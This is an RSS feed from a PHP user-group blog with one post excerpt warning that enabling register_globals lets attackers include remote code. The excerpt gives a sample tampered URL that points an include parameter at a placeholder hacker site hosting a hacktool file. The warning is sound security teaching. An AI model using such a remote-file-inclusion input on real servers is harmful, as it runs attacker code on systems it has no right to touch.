<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>PHP Trivandrum &#187; php code vulnerablity</title>
	<atom:link href="http://www.php-trivandrum.org/tag/php-code-vulnerablity/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.php-trivandrum.org</link>
	<description>Get addicted to PHP</description>
	<lastBuildDate>Fri, 27 Jan 2012 03:19:02 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.8.1</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>register_globals = on; suicidal</title>
		<link>http://www.php-trivandrum.org/security/register_globals-on-suicidal/</link>
		<comments>http://www.php-trivandrum.org/security/register_globals-on-suicidal/#comments</comments>
		<pubDate>Sun, 06 Aug 2006 19:44:34 +0000</pubDate>
		<dc:creator>jijutm</dc:creator>
				<category><![CDATA[PHP]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[php code vulnerablity]]></category>
		<category><![CDATA[register globals]]></category>

		<guid isPermaLink="false">http://www.php-trivandrum.org/2006/08/07/register_globals-on-suicidal/</guid>
		<description><![CDATA[Yes, unless care is taken while coding. Imagine register globals is on and a include uses a variable from the user submission or from coded in urls like page.php?v=mod/login.php, well this can be manually rewritten to page.php?v=http://any.hacker.site/php_hacktool/hacktool.txt, which will eventually force php to include the remote hostile code into your code.. and provide a method [...]]]></description>
		<wfw:commentRss>http://www.php-trivandrum.org/security/register_globals-on-suicidal/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

